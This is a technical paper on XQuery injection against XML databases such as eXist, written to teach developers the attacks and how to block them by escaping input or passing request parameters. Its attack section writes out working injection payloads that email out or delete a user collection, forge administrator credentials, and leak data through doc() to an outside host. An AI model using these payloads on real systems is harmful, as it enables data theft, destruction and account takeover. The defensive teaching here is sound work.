Note

I am not a security expert and, as far as I know, the domain covered by this paper is very new. The list of attacks and counter attacks mentioned hereafter is nothing more than the list of attacks and counter attacks I can think of. This list is certainly not exhaustive and following its advise is by no means a guarantee that you'll be safe! If you see (or think of) other attacks or solutions, drop me an email so that I may improve the next versions of this document.

Many thanks to Alessandro Vernet (Orbeon) for the time he has spent discussing these issues with me and for suggesting to rely on query string parameters and to Adam Retter (eXist-db developer) for his thorough review of this paper!

Code Injection

Wikipedia defines code injection as:

the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by an attacker to introduce (or "inject") code into a computer program to change the course of execution. The results of a code injection attack can be disastrous. For instance, code injection is used by some computer worms to propagate.

SQL injection is arguably the most common example of code injection since it can potentially affect any web application or website accessing a SQL database including all the widespread AMP systems.

The second well known example of code injection is Cross Site Scripting (XSS) which could be called "HTML and JavaScript injection".

According to the Web Hacking Incident Database, SQL injection is the number one attack method involved in 20% of the web attacks and Cross Site Scripting is number two with 13% suggesting that code injection techniques are involved in more than 1 out of 3 attacks on the web.

If it's difficult to find any mention of XQuery injection on the web, it's probably because so few websites are powered by XML databases but also because of the false assumption that XQuery is a read only language and that its expression power is limited, meaning that the consequences of XQuery injection attacks would remain limited.

This assumption must be revised now that XML databases have started implementing XQuery Update Facilities and that XQuery engines (either databases, libraries such as Saxon or middleware such as BEA Weblogic) have extensive extension function libraries which let them communicate with the external world! Furthermore, when you think about it, even the good old XSLT 1.0 document() function or its XPath 2.0/XQuery 1.0 doc() friend are potential risks.

Example of XQuery Injection

Scenario

If you develop an application that requires user interaction, you will probably need sooner or later some kind of user authentication, and if your application is powered by an XML database, you may want to store user information in this database.

Note

There are two ways to rely on a database for user authentication: you can either store user and password information in the database (like any other information) or rely on the database internal security mechanism. The authentication method used in this example just stores user and password information in the database.

In the Java world, Tomcat comes with a number of so called authentication "realms" for plain files, SQL databases or LDAP but there is no realm to use an XML database to store authentication information.

That's not really an issue since the realm interface is easy to implement. This interface has been designed so that you can store the passwords either as plain text or encrypted. Of course, it's safer (and recommended) to store encrypted passwords, but for the sake of this example, let's say you are lazy and store them as plain text. I'll spare you the details, but the real meat in your XML database realm will then be to return the password and roles for a user with a given login name.

If you are using an XML database such as eXist with its REST API, you will end up opening an URL with a Java statement such as:

new URL("http://localhost:8080/orbeon/exist/rest/db/app/users/?_query=//user[mail=%27" + username + "%27]")

Attack

Let's put on a black hat and try to attack a site powered by an XML database that gives us a login screen such as this one:

Figure 1: Login Screen

We don't know the precise statement used by the realm to retrieve information or the database structure, but we assume that the authentication injects the content of HTML form somewhere into an XQuery as a literal string and hope the injection is done without proper sanitization.

We don't know either if the programmer has used a single or a double quote to isolate the content of the input form, but since that makes only two possibilities, we will just try both.

The trick is:

  1. to close the literal string with a single or double quote

  2. to add whatever is needed to avoid to raise an XQuery parsing error

  3. to add the XQuery statement that will carry the attack

  4. to add again whatever is needed to avoid to raise a parsing error

  5. to open again a literal string using the same quote

Let's take care of the syntactic sugar first.

We'll assume that the XQuery expression is following this generic pattern:

<URL>?_query=<PATH>[<SUBPATH> = ' <entry value> ']

Our entry value can follow this other pattern:

' or <ATTACK> or .='

After injection, the XQuery expression will look like:

<URL>?_query=<PATH>[<SUBPATH> = '' or <ATTACK> or .='']

The inner or expression has 3 alternatives. The first one will likely return false (the <SUBPATH> is meant to be the relative path to the user name and most applications won't tolerate empty user names in their databases. The XQuery processor will thus pull the trigger and evaluate the attack statement.

The attack must be an XQuery "Expr" production. That includes FLOWR expressions, but excludes declarations that belong to the prologue. In practice, that means that we can't use declare namespace declarations and that we need to embed an extension functions call into elements that declare their namespaces.

What kind of attack can we inject?

The first kind of attacks we can try won't break anything but export information from the database to the external world.

With eXist, this is possible using standard extension modules such as the HTTP client module or the mail module. These modules can be activated or deactivated in the eXist configuration file and we can't be sure that the attack will work but if one of them is activated we'll be able to export the user collection...

An attack based on the mail module looks like the following:

<foo xmlns:mail='http://exist-db.org/xquery/mail'>
{
    let $message :=
    <mail xmlns:util='http://exist-db.org/xquery/util'>
        <from>vdv@dyomedea.com</from>
        <to>vdv@dyomedea.com</to>
        <subject>eXist collection</subject>
        <message>
            <text>The collection is :
{util:serialize(/*, ())}
            </text>
        </message>
    </mail>

return mail:send-email($message, 'localhost', ()) 
}
</foo>

A similar attack could send the content of the collection on pastebin.com using the HTTP client module.

To inject the attack, we concatenate the start container string (' or ), the attack itself and the end container string ( or .='), normalize the spaces and paste the result into the login entry field.

The login screen will return a login error, but if we've been lucky we will receive a mail with the full content of the collection on which the query has been run.

If nothing happened, we might have used the wrong quote and we can try again replacing the single quotes from our container string by double quotes.

If nothing happens once again, which is the case with the naive REST URL construction used in this example, this might be because the application does not encode the query for URI. In that case, we must do it ourselves and encode the string before copying it into the entry field like the XPath 2.0 encode-for-uri() would do.

And then, bingo:

Figure 2: New message!

We have a new message with all the information we need to login:

Figure 3: The mail

The second kind of attack we can try uses the same technique deletes information from the database. A very simple and extreme one just erases anything from the collection and leaves empty document elements:

for $u in //user return update delete $u/(@*|node()

Note that, in both cases, we have not assumed anything about the database structure!

SQL injection attacks often try to generate errors messages that are displayed within the resulting HTML pages by careless sites and expose information about the database structure but that hasn't been necessary so far.

On this authentication form, generating errors would have been hopeless since Tomcat handles this safely and only exposes a "yes/no" answer to user entries and sends error messages to the server log but on other forms this could also be an option, leading to a third kind of attacks.

If we know the database structure for any reason (this could be because we've successfully leaked information in error messages, because the application's code is open sourced or because you've managed to introspect the database using functions such as xmldb;get-child-collections()), we can also update user information with forged authentication data:

    let $u := //user[role='orbeon-admin'][1]
        return (
            update value $u/mail with 'eric@example.com',
            update value $u/password with 'foobar'
        ) 

What about the doc() function?

It can be used to leak information to the external world:

'foo' = doc(concat('http://myserver.example.com/?root=', name(/*[1])))

Protection

Now that we've seen the harm that these attacks can do, what can we do to prevent them?

A first set of recommendations is to limit the consequences of these attacks:

  1. Do not store non encrypted passwords.

  2. Use a user with read only permissions to perform read only queries.

  3. Do not enable extensions modules unless you really need them.

If the authentication realm of our example had followed these basic recommendations, our attacks would have had limited consequences:

  • If the database user used to query the database has no write access the attacker wouldn't have been able to erase the user information.

  • If the extensions modules that allow to send mails, the attacker wouldn't have been able to send a mail.

These recommendations are always worth to follow. They can be compared to recommending to avoid leaving valuables in a room but there are cases when you need to do so and that doesn't mean that you shouldn't put a lock on the room's door!

To block the attacks themselves, we need a way to avoid the values being copied into the XQuery expressions leaking out of the literal strings where they are supposed to be located.

Generic How To

The most common way to block these kind of attacks is to "escape" the dangerous characters or "sanitize" user inputs before sending them to the XQuery engine.

In an XQuery string literal, the "dangerous" characters are:

  1. The & that can be used to make references to predefined or digital entities and needs to be replaced by the &amp;

  2. The quote (either simple or double) that you use to delimit the literal that needs to be replaced by &apos; or &quot;

And that's all! These two replacements are enough to block code injections through string literals.

Of course, you also need to use a function such as encode-for-uri() so that the URL remains valid and to block injections through URL encoding.

The second way to block these attacks is to keep the values that are entered through web forms out of the query itself.

When using eXist, this can be done by encoding these values and sending them as URL query parameters. These parameters can then be retrieved using the request:get-parameter() extension function.

Which of these methods should we use?

There is no general rules and it's rather a matter of taste. That being said...

  • Sanitizing is more portable: request:get-parameter is an eXist specific function that cannot be used with other databases.

  • Parameters may (arguably) be considered cleaner since they separate the inputs from the request. They can also be used to call stored queries.

Note

These techniques are efficient and enough to protect your application as long as you don't open a new breach. This is the case when your XQuery expression dynamically executes something against a query engine.

In a highly hypothetical case where the XQuery expression would execute a SQL query, this SQL Query would have to be protected against SQL injection.

A more common case in XQuery land is when you use a *:evaluate() extension function to dynamically execute an XPath or XQuery expression.

In that case (see section “Related Attacks”) the expression needs to be further sanitized!

No Filters, Please!

It is common to see developers filtering values as a protection against SQL Injection and you could also do that as a protection against XQuery injection but in both cases this is often a bad idea!

Filtering user input is often a bad idea and whenever you do so you should be doing that for data quality reasons and not for security reasons since the constraints will very likely be different.

To protect this application against XQuery injection, we could have filtered out the user input to exclude simple quotes and that would have been effective (assuming we use a simple quote to delimit the string literal) but that would have given Tim O'Reilly a new opportunity to rant against dumb applications that do not accept is name as an input!

We've seen that it's as easy to sanitize user input than it would have been to filter it, so please, don't use filters for security!

Java

Assuming that we use single quotes to delimit XQuery string literals, inputs can be sanitized in Java using this function:

    static String sanitize(String text) {
         return text.replace("&", "&amp;").replace("'", "&apos;");
    }

Each user input must be sanitized separately and the whole query must then be encoded using the URLEncoder.encode() method. Depending on the context, it may also be a good idea to call an additional method such as trim() to remove leading and trailing space or toLowerCase() to normalize the value to lower case. In the authentication realm, the Java snippet could be:

     String query = URLEncoder.encode("//user[mail='" + sanitize(username.trim().toLowerCase()) + "']", "UTF-8");
     reader.parse(new InputSource(
             new URL("http://localhost:8080/orbeon/exist/rest/db/app/users/?_query=" + query).openStream()));

To use request parameters, the query and each of the parameters need to be encoded separately:

     String query = URLEncoder.encode(
            "declare namespace request='http://exist-db.org/xquery/request';//user[mail=request:get-parameter('mail', 0)]",
            "UTF-8");
     String usernameNormalized = URLEncoder.encode(username.trim().toLowerCase(), "UTF-8");
     reader.parse(new InputSource(
            new URL("http://localhost:8080/orbeon/exist/rest/db/app/users/?mail="+ usernameNormalized + "&_query=" + query).openStream()));

To query is now a fixed string that could be stored in the eXist database or encoded in a static variable.

XPath 2.0 Environments

In environments that rely on XPath 2.0 such as XSLT 2.0, XProc, XPL,... the same patterns can be used if we replace the Java methods with their XPath 2.0 equivalents. In XSLT 2.0 it is possible to define a sanitize function similar to the one we've created in Java but this isn't the case for other host languages and we'll skip this step.

To sanitize user inputs in an XPath 2.0 host language, we need to add a level of escaping because the & character is not available directly but through the &amp; entity reference. The XQuery query combines simple and double quotes that are not very easy to handle in a select attribute (even if the escaping rules of XPath 2.0 help a lot) and the query pieces can be put into variables for convenience. That being said, the user input can be sanitized using statements such as:

        <xsl:variable name="usernameSanitized"
            select="lower-case(normalize-space(replace(replace($username, '&amp;', '&amp;amp;'), '''', '&amp;apos;')))"/>
        <xsl:variable name="queryStart">//user[mail='</xsl:variable>
        <xsl:variable name="queryEnd">']</xsl:variable>
        <xsl:variable name="query" select="encode-for-uri(concat($queryStart, $usernameSanitized, $queryEnd))"/>
        <xsl:variable name="userInformation" 
             select="doc(concat('http://localhost:8080/orbeon/exist/rest/db/app/users/?_query=', $query))"/>

To use request parameters, simply write something such as:

        <xsl:variable name="usernameNormalized" select="lower-case(normalize-space($username))"/>
        <xsl:variable name="query">
            declare namespace request='http://exist-db.org/xquery/request';
            //user[mail=request:get-parameter('mail',0)]</xsl:variable>
        <xsl:variable name="userInformation"
            select="doc(concat('http://localhost:8080/orbeon/exist/rest/db/app/users/?mail=', 
                    encode-for-uri($usernameNormalized) , '&amp;_query=', encode-for-uri($query)))"/>

Here again; the choice to normalize spaces and convert to lower case depends on the context.

XSLT 2.0

In XSLT 2.0, functions can be used to implement this technique like those shown in this transformation:

<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:san="http://example.com/sanitization/"
    xmlns:xs="http://www.w3.org/2001/XMLSchema" exclude-result-prefixes="xs" version="2.0">
    
    <xsl:output method="text"/>
    
    <xsl:function name="san:sanitize-apos" as="xs:string">
        <xsl:param name="text" as="xs:string"/>
        <xsl:sequence select="replace(replace($text, '&amp;', '&amp;amp;'), '''', '&amp;apos;')"/>
    </xsl:function>
    <xsl:function name="san:sanitize-quot" as="xs:string">
        <xsl:param name="text" as="xs:string"/>
        <xsl:sequence select='replace(replace($text, "&amp;", "&amp;amp;"), """", "&amp;quot;")'/>
    </xsl:function>
    
    <xsl:template match="/">
        <xsl:value-of select="san:sanitize-apos(''' or ( for $u in //user return update delete $u/(@*|node() ) ) or .=''')"/>
    </xsl:template>
    
</xsl:stylesheet>

XQuery

Similar functions can be defined in XQuery:

xquery version "1.0";

declare function local:sanitize-apos($text as xs:string) as xs:string {
        replace(replace($text, '&amp;', '&amp;amp;'), '''', '&amp;apos;')
};

declare function local:sanitize-apos($text as xs:string) as xs:string {
        replace(replace($text, "&amp;", "&amp;amp;"), """", "&amp;quot;")
};


local:sanitize-apos(''' or ( for $u in //user return update delete $u/(@*|node() ) ) or .=''')

XForms

The problem is very similar in XForms with the difference that XForms is meant to deal with user input and that the chances that you'll hit the problem are significantly bigger!

The rule of thumb here again is: never inject a user input in an XQuery without sanitizing it or moving it out of the query using request parameters.

When using an implementation such as Orbeon Forms, that supports attribute value templates in resource attributes, it may be tempting to write submissions such as:

 <xforms:submission id="doSearch" method="get"
    resource="http://localhost:8080/orbeon/exist/rest/db/app/users/?_query=//user[mail='{instance('search')}']" 
    instance="result" replace="instance"/>

Unfortunately, this would be tantamount to the unsafe Java realm that we've used as our first example!

To secure this submission, we can just adapt one of the two methods used to secure XSLT accesses. This is especially straightforward with the Orbeon implementation that implements an xxforms:variable extension very similar to XSLT variables. You can also go with FLOWR expressions or use xforms:bind/@calculate definitions to store intermediate results and make them more readable but it is also possible to write a mega XPath 2.0 expression such as this one:

 <xforms:submission id="doSearch" method="get"
      resource="http://localhost:8080/orbeon/exist/rest/db/app/users/?_query={encode-for-uri(concat(
            '//user[mail=''', 
             lower-case(normalize-space(replace(replace(instance('search'), '&amp;', '&amp;amp;'), '''', '&amp;apos;'))), 
             ''']'))}"
      instance="result" replace="instance"/>

The same methods can be applied using query parameters:

  <xforms:submission id="doSearch" method="get"
     resource="http://localhost:8080/orbeon/exist/rest/db/app/users/?mail={
          encode-for-uri(lower-case(instance('search')))
        }&amp;_query={
          encode-for-uri('declare namespace request=''http://exist-db.org/xquery/request'';
                          //user[mail=request:get-parameter(''mail'',0)]')}"
      instance="result" replace="instance"/>

This is working, but we can do much simpler relying on XForms to do the encoding all by itself!. The complete XForms model would then be:

        <xforms:model>
            <xforms:instance id="search">
                <search xmlns="">
                    <mail/>
                    <_query>declare namespace request='http://exist-db.org/xquery/request';
                        //user[mail=request:get-parameter('mail',0)]</_query>
                </search>
            </xforms:instance>
            <xforms:instance id="result">
                <empty xmlns=""/>
            </xforms:instance>
            <xforms:submission id="doSearch" method="get" ref="instance('search')"
                resource="http://localhost:8080/orbeon/exist/rest/db/app/users/"
                instance="result" replace="instance"/>
        </xforms:model>

Related Attacks

We have explored in depth injections targeted on XQuery string literals. What about other injections on XML based applications?

XQuery Numeric Literal Injection

It may be tempting to copy numeric input fields directly into XQuery expressions. That's safe if, and only if, these fields are validated. If not, the techniques that we've seen with string literals can easily be adapted (in fact, it's even easier for your attackers since they do not need to bother with quotes!).

That's safe if you pass these values within request parameters but you will generate XQuery parsing errors if the input doesn't belong to the expected data type. Also note that request:get-parameter() returns string values and may need casting in your XQuery query.

In both cases, it is a good idea to validate numeric input fields before sending your query (this is a case where filters can be used without risking to get Tim O'Reilly angry)!

When using XForms, this can be done by binding these inputs to numeric datatypes. Otherwise, use whatever language you are programming with to do the test.

If you use literals and don't want (or can't) do that test outside the XQuery query itself, you can also copy the value in a string literal and explicitly cast it into the numeric data type you are using. The string literal then needs to be sanitized like we've already seen.

XQuery Direct Element Injection

Literals are the location where user input is most likely copied in XQuery based applications (they cover all the cases where the database is queried according to parameters entered by our users) but there are cases where you may want to copy user input within XQuery direct element constructors.

One of the use cases for this is the XQuery Update Facility where update primitives may contain direct element constructors, in which it is tempting to include input fields values.

Here again you're safe if you use request parameters but you need to sanitize your input if you're doing direct copy.

The danger here is not so much delimiters but rather enclosed expressions that let your attacker include arbitrary XQuery expressions.

The < also needs to be escaped as it would be understood as a tag delimiter as well, of course as the &..

That makes 4 characters to escape:

  1. & must be replaced by &amp;

  2. < must be replaced by &lt;

  3. { must be replaced by {{

  4. } must be replaced by }}

XUpdate injection

XUpdate is safer than XQuery Update Facility since the latter has no support for enclosed expressions. That doesn't mean that & and < are not meant to be escaped but since XUpdate documents are a well formed XML documents, the tool or API that you'll be using to create this document will take care of that if it's an XML tool

Unfortunately XUpdate uses XPath expressions to qualify the targets where updates should be applied, and if you use a database like eXist, which supports XPath 2.0 (or XQuery 1.0) in these expressions, this opens a door for attacks that are similar to XQuery literal injections.

Again, if you use request parameters you'll be safe.

If not, the sanitization to apply is the same as that for XQuery injection except that the XML tool or API that you'll be using should take care of the XML entities.

*:evaluate() injection

Extension functions such as saxon:evaluate (or eXist's util:eval()) are also prone to attacks similar to XQuery injection if user input is not properly sanitized.

The consequences of these injections may be amplified by extension functions that provide read and write access to system resources but even vanilla XPath can be harmful with its document() function that provides read access to the file system as well as network resources that may be behind the firewall protecting the server.

These function calls need to be secured using similar techniques adapted to the context where the function is used.

Defining variables out of the function call and using these variables within the function call is an effective solution quite similar to using query parameters in a query.

Note

When such functions are called inside a query, you may have to sanitize twice! In that case, the second level of sanitization can be done in XQuery.

Eric van der Vlist

Dyomedea

Eric is an independent consultant and trainer. His domain of expertise includes Web development and XML technologies.

He is the creator and main editor of XMLfr.org, the main site dedicated to XML technologies in French, the author of the O'Reilly animal books XML Schema and RELAX NG and a member or the ISO DSDL (http://dsdl.org) working group focused on XML schema languages.

He is based in Paris and you can reach him by mail (vdv@dyomedea.com) or meet him at one of the many conferences where he presents his projects.